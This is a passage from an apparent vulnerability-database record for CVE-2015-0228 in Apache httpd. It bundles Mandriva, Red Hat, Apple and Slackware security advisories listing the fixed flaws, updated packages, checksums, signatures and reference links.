module in the Apache HTTP Server through\n 2.4.10 does not support an httpd configuration in which the same\n Lua authorization provider is used with different arguments within\n different contexts, which allows remote attackers to bypass intended\n access restrictions in opportunistic circumstances by leveraging\n multiple Require directives, as demonstrated by a configuration that\n specifies authorization for one group to access a certain directory,\n and authorization for a second group to access a second directory\n (CVE-2014-8109). A malicious client could\n use Trailer headers to set additional HTTP headers after header\n processing was performed by other modules. This could, for example,\n lead to a bypass of header restrictions defined with mod_headers\n (CVE-2013-5704). \n \n Note: With this update, httpd has been modified to not merge HTTP\n Trailer headers with other HTTP request headers. A newly introduced\n configuration directive MergeTrailers can be used to re-enable the\n old method of processing Trailer headers, which also re-introduces\n the aforementioned flaw. \n \n This update also fixes the following bug:\n \n Prior to this update, the mod_proxy_wstunnel module failed to set\n up an SSL connection when configured to use a back end server using\n the wss: URL scheme, causing proxied connections to fail. In these\n updated packages, SSL is used when proxying to wss: back end servers\n (rhbz#1141950). The verification\n of md5 checksums and GPG signatures is performed automatically for you. You can obtain the\n GPG public key of the Mandriva Security Team by executing:\n\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\n\n You can view other update advisories for Mandriva Linux at:\n\n http://www.mandriva.com/en/support/security/advisories/\n\n If you want to report vulnerabilities, please contact\n\n security_(at)_mandriva.com\n _______________________________________________________________________\n\n Type Bits/KeyID Date User ID\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\n <security*mandriva.com>\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.12 (GNU/Linux)\n\niD8DBQFVFnRImqjQ0CJFipgRAhbAAKDF22tbaWSxzaiqvhq0t6uM1bwWvgCfVNIJ\n7XU6s8wMPlxQucpKSIVIKYI=\n=4uS5\n-----END PGP SIGNATURE-----\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Moderate: httpd24-httpd security update\nAdvisory ID: RHSA-2015:1666-01\nProduct: Red Hat Software Collections\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2015-1666.html\nIssue date: 2015-08-24\nCVE Names: CVE-2015-0228 CVE-2015-0253 CVE-2015-3183 \n CVE-2015-3185 \n=====================================================================\n\n1. Summary:\n\nUpdated httpd24-httpd packages that fix multiple security issues are now\navailable for Red Hat Software Collections 2. \n\nRed Hat Product Security has rated this update as having Moderate security\nimpact. Common Vulnerability Scoring System (CVSS) base scores, which give\ndetailed severity ratings, are available for each vulnerability from the\nCVE links in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Software Collections for Red Hat Enterprise Linux Server (v. 6) - noarch, x86_64\nRed Hat Software Collections for Red Hat Enterprise Linux Server (v. 7) - noarch, x86_64\nRed Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 6.5) - noarch, x86_64\nRed Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 6.6) - noarch, x86_64\nRed Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.1) - noarch, x86_64\nRed Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 6) - noarch, x86_64\nRed Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7) - noarch, x86_64\n\n3. \n\nMultiple flaws were found in the way httpd parsed HTTP requests and\nresponses using chunked transfer encoding. A remote attacker could use\nthese flaws to create a specially crafted request, which httpd would decode\ndifferently from an HTTP proxy software in front of it, possibly leading to\nHTTP request smuggling attacks. (CVE-2015-3183)\n\nIt was discovered that in httpd 2.4, the internal API function\nap_some_auth_required() could incorrectly indicate that a request was\nauthenticated even when no authentication was used. An httpd module using\nthis API function could consequently allow access that should have been\ndenied. (CVE-2015-3185)\n\nNote: This update introduces new a new API function,\nap_some_authn_required(), which correctly indicates if a request is\nauthenticated. External httpd modules using the old API function should be\nmodified to use the new one to completely resolve this issue. \n\nA denial of service flaw was found in the way the mod_lua httpd module\nprocessed certain WebSocket Ping requests. (CVE-2015-0228)\n\nA NULL pointer dereference flaw was found in the way httpd generated\ncertain error responses. A remote attacker could possibly use this flaw to\ncrash the httpd child process using a request that triggers a certain HTTP\nerror. (CVE-2015-0253)\n\nAll httpd24-httpd users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues. After installing\nthe updated packages, the httpd24-httpd service will be restarted\nautomatically. \n\n4. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. \n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1202988 - CVE-2015-0228 httpd: Possible mod_lua crash due to websocket bug\n1243887 - CVE-2015-3183 httpd: HTTP request smuggling attack against chunked request parser\n1243888 - CVE-2015-3185 httpd: ap_some_auth_required() does not properly indicate authenticated request in 2.4\n1243891 - CVE-2015-0253 httpd: NULL pointer dereference crash with ErrorDocument 400 pointing to a local URL-path\n\n6. Package List:\n\nRed Hat Software Collections for Red Hat Enterprise Linux Server (v. 6):\n\nSource:\nhttpd24-httpd-2.4.12-4.el6.2.src.rpm\n\nnoarch:\nhttpd24-httpd-manual-2.4.12-4.el6.2.noarch.rpm\n\nx86_64:\nhttpd24-httpd-2.4.12-4.el6.2.x86_64.rpm\nhttpd24-httpd-debuginfo-2.4.12-4.el6.2.x86_64.rpm\nhttpd24-httpd-devel-2.4.12-4.el6.2.x86_64.rpm\nhttpd24-httpd-tools-2.4.12-4.el6.2.x86_64.rpm\nhttpd24-mod_ldap-2.4.12-4.el6.2.x86_64.rpm\nhttpd24-mod_proxy_html-2.4.12-4.el6.2.x86_64.rpm\nhttpd24-mod_session-2.4.12-4.el6.2.x86_64.rpm\nhttpd24-mod_ssl-2.4.12-4.el6.2.x86_64.rpm\n\nRed Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 6.5):\n\nSource:\nhttpd24-httpd-2.4.12-4.el6.2.src.rpm\n\nnoarch:\nhttpd24-httpd-manual-2.4.12-4.el6.2.noarch.rpm\n\nx86_64:\nhttpd24-httpd-2.4.12-4.el6.2.x86_64.rpm\nhttpd24-httpd-debuginfo-2.4.12-4.el6.2.x86_64.rpm\nhttpd24-httpd-devel-2.4.12-4.el6.2.x86_64.rpm\nhttpd24-httpd-tools-2.4.12-4.el6.2.x86_64.rpm\nhttpd24-mod_ldap-2.4.12-4.el6.2.x86_64.rpm\nhttpd24-mod_proxy_html-2.4.12-4.el6.2.x86_64.rpm\nhttpd24-mod_session-2.4.12-4.el6.2.x86_64.rpm\nhttpd24-mod_ssl-2.4.12-4.el6.2.x86_64.rpm\n\nRed Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 6.6):\n\nSource:\nhttpd24-httpd-2.4.12-4.el6.2.src.rpm\n\nnoarch:\nhttpd24-httpd-manual-2.4.12-4.el6.2.noarch.rpm\n\nx86_64:\nhttpd24-httpd-2.4.12-4.el6.2.x86_64.rpm\nhttpd24-httpd-debuginfo-2.4.12-4.el6.2.x86_64.rpm\nhttpd24-httpd-devel-2.4.12-4.el6.2.x86_64.rpm\nhttpd24-httpd-tools-2.4.12-4.el6.2.x86_64.rpm\nhttpd24-mod_ldap-2.4.12-4.el6.2.x86_64.rpm\nhttpd24-mod_proxy_html-2.4.12-4.el6.2.x86_64.rpm\nhttpd24-mod_session-2.4.12-4.el6.2.x86_64.rpm\nhttpd24-mod_ssl-2.4.12-4.el6.2.x86_64.rpm\n\nRed Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 6):\n\nSource:\nhttpd24-httpd-2.4.12-4.el6.2.src.rpm\n\nnoarch:\nhttpd24-httpd-manual-2.4.12-4.el6.2.noarch.rpm\n\nx86_64:\nhttpd24-httpd-2.4.12-4.el6.2.x86_64.rpm\nhttpd24-httpd-debuginfo-2.4.12-4.el6.2.x86_64.rpm\nhttpd24-httpd-devel-2.4.12-4.el6.2.x86_64.rpm\nhttpd24-httpd-tools-2.4.12-4.el6.2.x86_64.rpm\nhttpd24-mod_ldap-2.4.12-4.el6.2.x86_64.rpm\nhttpd24-mod_proxy_html-2.4.12-4.el6.2.x86_64.rpm\nhttpd24-mod_session-2.4.12-4.el6.2.x86_64.rpm\nhttpd24-mod_ssl-2.4.12-4.el6.2.x86_64.rpm\n\nRed Hat Software Collections for Red Hat Enterprise Linux Server (v. 7):\n\nSource:\nhttpd24-httpd-2.4.12-6.el7.1.src.rpm\n\nnoarch:\nhttpd24-httpd-manual-2.4.12-6.el7.1.noarch.rpm\n\nx86_64:\nhttpd24-httpd-2.4.12-6.el7.1.x86_64.rpm\nhttpd24-httpd-debuginfo-2.4.12-6.el7.1.x86_64.rpm\nhttpd24-httpd-devel-2.4.12-6.el7.1.x86_64.rpm\nhttpd24-httpd-tools-2.4.12-6.el7.1.x86_64.rpm\nhttpd24-mod_ldap-2.4.12-6.el7.1.x86_64.rpm\nhttpd24-mod_proxy_html-2.4.12-6.el7.1.x86_64.rpm\nhttpd24-mod_session-2.4.12-6.el7.1.x86_64.rpm\nhttpd24-mod_ssl-2.4.12-6.el7.1.x86_64.rpm\n\nRed Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.1):\n\nSource:\nhttpd24-httpd-2.4.12-6.el7.1.src.rpm\n\nnoarch:\nhttpd24-httpd-manual-2.4.12-6.el7.1.noarch.rpm\n\nx86_64:\nhttpd24-httpd-2.4.12-6.el7.1.x86_64.rpm\nhttpd24-httpd-debuginfo-2.4.12-6.el7.1.x86_64.rpm\nhttpd24-httpd-devel-2.4.12-6.el7.1.x86_64.rpm\nhttpd24-httpd-tools-2.4.12-6.el7.1.x86_64.rpm\nhttpd24-mod_ldap-2.4.12-6.el7.1.x86_64.rpm\nhttpd24-mod_proxy_html-2.4.12-6.el7.1.x86_64.rpm\nhttpd24-mod_session-2.4.12-6.el7.1.x86_64.rpm\nhttpd24-mod_ssl-2.4.12-6.el7.1.x86_64.rpm\n\nRed Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nhttpd24-httpd-2.4.12-6.el7.1.src.rpm\n\nnoarch:\nhttpd24-httpd-manual-2.4.12-6.el7.1.noarch.rpm\n\nx86_64:\nhttpd24-httpd-2.4.12-6.el7.1.x86_64.rpm\nhttpd24-httpd-debuginfo-2.4.12-6.el7.1.x86_64.rpm\nhttpd24-httpd-devel-2.4.12-6.el7.1.x86_64.rpm\nhttpd24-httpd-tools-2.4.12-6.el7.1.x86_64.rpm\nhttpd24-mod_ldap-2.4.12-6.el7.1.x86_64.rpm\nhttpd24-mod_proxy_html-2.4.12-6.el7.1.x86_64.rpm\nhttpd24-mod_session-2.4.12-6.el7.1.x86_64.rpm\nhttpd24-mod_ssl-2.4.12-6.el7.1.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2015-0228\nhttps://access.redhat.com/security/cve/CVE-2015-0253\nhttps://access.redhat.com/security/cve/CVE-2015-3183\nhttps://access.redhat.com/security/cve/CVE-2015-3185\nhttps://access.redhat.com/security/updates/classification/#moderate\n\n8. Contact:\n\nThe Red Hat security contact is <secalert@redhat.com>. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2015 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFV22bPXlSAg2UNWIIRAmm2AKCI6AByn1Zlj/2R8aLKFD4hZno5VgCfcx8H\ny5DWl0MjeqKeAOHiddwyDdU=\n=yzQP\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. These issues were addressed by updating Apache to\nversion 2.4.16. \nCVE-ID\nCVE-2013-5704\nCVE-2014-3581\nCVE-2014-3583\nCVE-2014-8109\nCVE-2015-0228\nCVE-2015-0253\nCVE-2015-3183\nCVE-2015-3185\n\nBIND\nAvailable for: OS X Yosemite v10.10.4 or later\nImpact: Multiple vulnerabilities in BIND, the most severe of which\nmay allow a remote attacker to cause a denial of service\nDescription: Multiple vulnerabilities existed in BIND versions prior\nto 9.9.7. These issues were addressed by updating BIND to version\n9.9.7. \nCVE-ID\nCVE-2014-8500\nCVE-2015-1349\n\nPostgreSQL\nAvailable for: OS X Yosemite v10.10.4 or later\nImpact: Multiple vulnerabilities in PostgreSQL, the most serious of\nwhich may lead to arbitrary code execution\nDescription: Multiple vulnerabilities existed in PostgreSQL versions\nprior to 9.3.9. These issues were addressed by updating PostgreSQL to\nversion 9.3.9. \nCVE-ID\nCVE-2014-0067\nCVE-2014-8161\nCVE-2015-0241\nCVE-2015-0242\nCVE-2015-0243\nCVE-2015-0244\nCVE-2015-3165\nCVE-2015-3166\nCVE-2015-3167\n\nWiki Server\nAvailable for: OS X Yosemite v10.10.4 or later\nImpact: Multiple XML security issues in Wiki Server\nDescription: Multiple XML vulnerabilities existed in Wiki Server\nbased on Twisted. This issue was addressed by removing Twisted. \nCVE-ID\nCVE-2015-5911 : Zachary Jones of WhiteHat Security Threat Research\nCenter\n\n\nOS X Server 5.0.3 may be obtained from the Mac App Store. \n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n+--------------------------+\npatches/packages/httpd-2.4.16-i486-1_slack14.1.txz: Upgraded. \n This update fixes the following security issues:\n * CVE-2015-0253: Fix a crash with ErrorDocument 400 pointing to a local\n URL-path with the INCLUDES filter active, introduced in 2.4.11. \n * CVE-2015-3183: core: Fix chunk header parsing defect. Remove\n apr_brigade_flatten(), buffering and duplicated code from the HTTP_IN\n filter, parse chunks in a single pass with zero copy. Limit accepted\n chunk-size to 2^63-1 and be strict about chunk-ext authorized characters. \n * CVE-2015-3185: Replacement of ap_some_auth_required (unusable in Apache\n httpd 2.4) with new ap_some_authn_required and ap_force_authn hook. \n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0228\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0253\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3183\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3185\n (* Security fix *)\n+--------------------------+\n\n\nWhere to find the new packages:\n+-----------------------------+\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you. \n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/httpd-2.4.16-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/httpd-2.4.16-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/httpd-2.4.16-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/httpd-2.4.16-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/httpd-2.4.16-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/httpd-2.4.16-x86_64-1.txz\n\n\nMD5 signatures:\n+-------------+\n\nSlackware 14.0 package:\nd78c9925e69ba6ce14d67fb67245981b httpd-2.4.16-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 package:\n1370e3c7e135bf07b65e73049099a942 httpd-2.4.16-x86_64-1_slack14.0.txz\n\nSlackware 14.1 package:\nea116c45bba8c80f59cfe0394a8f87fa httpd-2.4.16-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 package:\n8b5b1caa1fa203b07b529f77834fac16 httpd-2.4.16-x86_64-1_slack14.1.txz\n\nSlackware -current package:\n01ccb961f17bd14c1d157892af4c9f1d n/httpd-2.4.16-i586-1.txz\n\nSlackware x86_64 -current package:\n70a6644de3585007861e57cf08608843 n/httpd-2.4.16-x86_64-1.txz\n\n\nInstallation instructions:\n+------------------------+\n\nUpgrade the package as root:\n# upgradepkg httpd-2.4.16-i486-1_slack14.1.txz\n\nThen, restart Apache httpd:\n\n# /etc/rc.d/rc.httpd stop\n# /etc/rc.d/rc.httpd start\n\n\n+-----+\n\nSlackware Linux Security Team\nhttp://slackware.com/gpg-key\nsecurity@slackware.com\n\n+------------------------------------------------------------------------+\n| To leave the slackware-security mailing list: |\n+------------------------------------------------------------------------+\n| Send an email to majordomo@slackware.com with this text in the body of |\n| the email message: |\n| |\n| unsubscribe slackware-security |\n| |\n| You will get a confirmation message back containing instructions to |\n| complete the process. Please do not reply to this email address", sources: [ { db: "NVD", id: "CVE-2015-0228", }, { db: "JVNDB", id: "JVNDB-2015-001673", }, { db: "BID", id: "91787", }, { db: "BID", id: "73041", }, { db: "VULHUB", id: "VHN-78174", }, { db: "VULMON", id: "CVE-2015-0228", }, { db: "PACKETSTORM", id: "130735", }, { db: "PACKETSTORM", id: "131098", }, { db: "PACKETSTORM", id: "133281", }, { db: "PACKETSTORM", id: "133619", }, { db: "PACKETSTORM", id: "132743", }, ], trust: 2.79, }, external_ids: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { db: "NVD", id: "CVE-2015-0228", trust: 3.4, }, { db: "BID", id: "91787", trust: 2.1, }, { db: "BID", id: "73041", trust: 2.1, }, { db: "SECTRACK", id: "1032967", trust: 1.8, }, { db: "JVN", id: "JVNVU99970459", trust: 0.8, }, { db: "JVNDB", id: "JVNDB-2015-001673", trust: 0.8, }, { db: "CNNVD", id: "CNNVD-201503-136", trust: 0.7, }, { db: "PACKETSTORM", id: "133281", trust: 0.2, }, { db: "PACKETSTORM", id: "132743", trust: 0.2, }, { db: "VULHUB", id: "VHN-78174", trust: 0.1, }, { db: "VULMON", id: "CVE-2015-0228", trust: 0.1, }, { db: "PACKETSTORM", id: "130735", trust: 0.1, }, { db: "PACKETSTORM", id: "131098", trust: 0.1, }, { db: "PACKETSTORM", id: "133619", trust: 0.1, }, ], sources: [ { db: "VULHUB", id: "VHN-78174", }, { db: "VULMON", id: "CVE-2015-0228", }, { db: "BID", id: "91787", }, { db: "BID", id: "73041", }, { db: "JVNDB", id: "JVNDB-2015-001673", }, { db: "PACKETSTORM", id: "130735", }, { db: "PACKETSTORM", id: "131098", }, { db: "PACKETSTORM", id: "133281", }, { db: "PACKETSTORM", id: "133619", }, { db: "PACKETSTORM", id: "132743", }, { db: "CNNVD", id: "CNNVD-201503-136", }, { db: "NVD", id: "CVE-2015-0228", }, ], }, id: "VAR-201503-0050", iot: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: true, sources: [ { db: "VULHUB", id: "VHN-78174", }, ], trust: 0.01, }, last_update_date: "2024-11-23T19:29:26.462000Z", patch: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { title: "APPLE-SA-2015-08-13-2 OS X Yosemite v10.10.5 and Security Update 2015-006", trust: 0.8, url: "http://lists.apple.com/archives/security-announce/2015/Aug/msg00001.html", }, { title: "APPLE-SA-2015-09-16-4 OS X Server 5.0.3", trust: 0.8, url: "http://lists.apple.com/archives/security-announce/2015/Sep/msg00004.html", }, { title: "HT205219", trust: 0.8, url: "https://support.apple.com/en-us/HT205219", }, { title: "HT205031", trust: 0.8, url: "http://support.apple.com/en-us/HT205031", }, { title: "HT205219", trust: 0.8, url: "http://support.apple.com/ja-jp/HT205219", }, { title: "HT205031", trust: 0.8, url: "http://support.apple.com/ja-jp/HT205031", }, { title: "Apache 2.4.13", trust: 0.8, url: "http://svn.apache.org/repos/asf/httpd/httpd/branches/2.4.x/CHANGES", }, { title: "*) SECURITY: CVE-2015-0228 (cve.mitre.org)", trust: 0.8, url: "https://github.com/apache/httpd/commit/643f0fcf3b8ab09a68f0ecd2aa37aafeda3e63ef", }, { title: "Oracle Critical Patch Update Advisory - July 2016", trust: 0.8, url: "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html", }, { title: "Text Form of Oracle Critical Patch Update - July 2016 Risk Matrices", trust: 0.8, url: "http://www.oracle.com/technetwork/topics/security/cpujul2016verbose-2881721.html", }, { title: "Oracle Solaris Third Party Bulletin - October 2015", trust: 0.8, url: "http://www.oracle.com/technetwork/topics/security/bulletinoct2015-2511968.html", }, { title: "July 2016 Critical Patch Update Released", trust: 0.8, url: "http://blogs.oracle.com/security/entry/july_2016_critical_patch_update", }, { title: "modules-lua-lua_request.c", trust: 0.6, url: "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=54055", }, { title: "Red Hat: CVE-2015-0228", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database&qid=CVE-2015-0228", }, { title: "Amazon Linux AMI: ALAS-2015-579", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami&qid=ALAS-2015-579", }, { title: "Ubuntu Security Notice: apache2 vulnerabilities", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice&qid=USN-2523-1", }, { title: "DC-2: Vulnhub Walkthrough", trust: 0.1, url: "https://github.com/vshaliii/DC-2-Vulnhub-Walkthrough ", }, { title: "Requirements\nvulnsearch-cve\nUsage\nvulnsearch\nUsage\nTest Sample", trust: 0.1, url: "https://github.com/kasem545/vulnsearch ", }, { title: "Shodan Search Script", trust: 0.1, url: "https://github.com/firatesatoglu/shodanSearch ", }, ], sources: [ { db: "VULMON", id: "CVE-2015-0228", }, { db: "JVNDB", id: "JVNDB-2015-001673", }, { db: "CNNVD", id: "CNNVD-201503-136", }, ], }, problemtype_data: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { problemtype: "CWE-20", trust: 1.9, }, ], sources: [ { db: "VULHUB", id: "VHN-78174", }, { db: "JVNDB", id: "JVNDB-2015-001673", }, { db: "NVD", id: "CVE-2015-0228", }, ], }, references: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { trust: 2.7, url: "http://advisories.mageia.org/mgasa-2015-0099.html", }, { trust: 2.4, url: "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html", }, { trust: 2.1, url: "http://www.oracle.com/technetwork/topics/security/linuxbulletinjan2016-2867209.html", }, { trust: 1.9, url: "http://rhn.redhat.com/errata/rhsa-2015-1666.html", }, { trust: 1.9, url: "http://www.ubuntu.com/usn/usn-2523-1", }, { trust: 1.8, url: "http://lists.apple.com/archives/security-announce/2015/aug/msg00001.html", }, { trust: 1.8, url: "http://lists.apple.com/archives/security-announce/2015/sep/msg00004.html", }, { trust: 1.8, url: "http://www.securityfocus.com/bid/73041", }, { trust: 1.8, url: "http://www.securityfocus.com/bid/91787", }, { trust: 1.8, url: "https://support.apple.com/ht205219", }, { trust: 1.8, url: "https://support.apple.com/kb/ht205031", }, { trust: 1.8, url: "http://www.securitytracker.com/id/1032967", }, { trust: 1.8, url: "http://lists.opensuse.org/opensuse-updates/2015-03/msg00006.html", }, { trust: 1.2, url: "http://svn.apache.org/repos/asf/httpd/httpd/branches/2.4.x/changes", }, { trust: 1.2, url: "https://github.com/apache/httpd/commit/643f0fcf3b8ab09a68f0ecd2aa37aafeda3e63ef", }, { trust: 1.2, url: "https://github.com/apache/httpd/commit/78eb3b9235515652ed141353d98c239237030410", }, { trust: 1.1, url: "https://lists.apache.org/thread.html/56c2e7cc9deb1c12a843d0dc251ea7fd3e7e80293cde02fcd65286ba%40%3ccvs.httpd.apache.org%3e", }, { trust: 1.1, url: "https://lists.apache.org/thread.html/84a3714f0878781f6ed84473d1a503d2cc382277e100450209231830%40%3ccvs.httpd.apache.org%3e", }, { trust: 1.1, url: "https://lists.apache.org/thread.html/rd18c3c43602e66f9cdcf09f1de233804975b9572b0456cc582390b6f%40%3ccvs.httpd.apache.org%3e", }, { trust: 1.1, url: "https://lists.apache.org/thread.html/re3d27b6250aa8548b8845d314bb8a350b3df326cacbbfdfe4d455234%40%3ccvs.httpd.apache.org%3e", }, { trust: 1.1, url: "https://lists.apache.org/thread.html/rf6449464fd8b7437704c55f88361b66f12d5b5f90bcce66af4be4ba9%40%3ccvs.httpd.apache.org%3e", }, { trust: 1.1, url: "https://lists.apache.org/thread.html/ra7f6aeb28661fbf826969526585f16856abc4615877875f9d3b35ef4%40%3ccvs.httpd.apache.org%3e", }, { trust: 1.1, url: "https://lists.apache.org/thread.html/rc998b18880df98bafaade071346690c2bc1444adaa1a1ea464b93f0a%40%3ccvs.httpd.apache.org%3e", }, { trust: 1.1, url: "https://lists.apache.org/thread.html/r83109088737656fa6307bd99ab40f8ff0269ae58d3f7272d7048494a%40%3ccvs.httpd.apache.org%3e", }, { trust: 1.1, url: "https://lists.apache.org/thread.html/r9f93cf6dde308d42a9c807784e8102600d0397f5f834890708bf6920%40%3ccvs.httpd.apache.org%3e", }, { trust: 1.1, url: "https://lists.apache.org/thread.html/rcc44594d4d6579b90deccd4536b5d31f099ef563df39b094be286b9e%40%3ccvs.httpd.apache.org%3e", }, { trust: 1.1, url: "https://lists.apache.org/thread.html/rb14daf9cc4e28d18cdc15d6a6ca74e565672fabf7ad89541071d008b%40%3ccvs.httpd.apache.org%3e", }, { trust: 1.1, url: "https://lists.apache.org/thread.html/r76142b8c5119df2178be7c2dba88fde552eedeec37ea993dfce68d1d%40%3ccvs.httpd.apache.org%3e", }, { trust: 1, url: "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0228", }, { trust: 0.8, url: "http://jvn.jp/vu/jvnvu99970459/index.html", }, { trust: 0.8, url: "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-0228", }, { trust: 0.6, url: "httpd.apache.org%3e", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/re3d27b6250aa8548b8845d314bb8a350b3df326cacbbfdfe4d455234@%3ccvs.", }, { trust: 0.6, url: "httpd/commit/643f0fcf3b8ab09a68f0ecd2aa37aafeda3e63ef", }, { trust: 0.6, url: "https://github.com/apache/", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/rb14daf9cc4e28d18cdc15d6a6ca74e565672fabf7ad89541071d008b@%3ccvs.", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/rc998b18880df98bafaade071346690c2bc1444adaa1a1ea464b93f0a@%3ccvs.", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/84a3714f0878781f6ed84473d1a503d2cc382277e100450209231830@%3ccvs.", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/r76142b8c5119df2178be7c2dba88fde552eedeec37ea993dfce68d1d@%3ccvs.", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/rf6449464fd8b7437704c55f88361b66f12d5b5f90bcce66af4be4ba9@%3ccvs.", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/rd18c3c43602e66f9cdcf09f1de233804975b9572b0456cc582390b6f@%3ccvs.", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/r9f93cf6dde308d42a9c807784e8102600d0397f5f834890708bf6920@%3ccvs.", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/r83109088737656fa6307bd99ab40f8ff0269ae58d3f7272d7048494a@%3ccvs.", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/rcc44594d4d6579b90deccd4536b5d31f099ef563df39b094be286b9e@%3ccvs.", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/56c2e7cc9deb1c12a843d0dc251ea7fd3e7e80293cde02fcd65286ba@%3ccvs.", }, { trust: 0.6, url: "httpd/branches/2.4.x/changes", }, { trust: 0.6, url: "http://svn.apache.org/repos/asf/", }, { trust: 0.6, url: "httpd/commit/78eb3b9235515652ed141353d98c239237030410", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/ra7f6aeb28661fbf826969526585f16856abc4615877875f9d3b35ef4@%3ccvs.", }, { trust: 0.5, url: "https://nvd.nist.gov/vuln/detail/cve-2015-0228", }, { trust: 0.3, url: "http://www.oracle.com", }, { trust: 0.3, url: "http://support.citrix.com/article/ctx216642", }, { trust: 0.3, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21984819", }, { trust: 0.3, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21988710", }, { trust: 0.3, url: "http://httpd.apache.org/", }, { trust: 0.3, url: "svn.apache.org/repos/asf/httpd/httpd/branches/2.4.x/changes", }, { trust: 0.3, url: "http://prod.lists.apple.com/archives/security-announce/2015/aug/msg00001.html", }, { trust: 0.3, url: "https://nvd.nist.gov/vuln/detail/cve-2014-8109", }, { trust: 0.3, url: "https://nvd.nist.gov/vuln/detail/cve-2014-3581", }, { trust: 0.3, url: "https://nvd.nist.gov/vuln/detail/cve-2015-3183", }, { trust: 0.3, url: "https://nvd.nist.gov/vuln/detail/cve-2015-3185", }, { trust: 0.3, url: "https://nvd.nist.gov/vuln/detail/cve-2015-0253", }, { trust: 0.2, url: "https://access.redhat.com/security/cve/cve-2015-0228", }, { trust: 0.2, url: "https://nvd.nist.gov/vuln/detail/cve-2014-3583", }, { 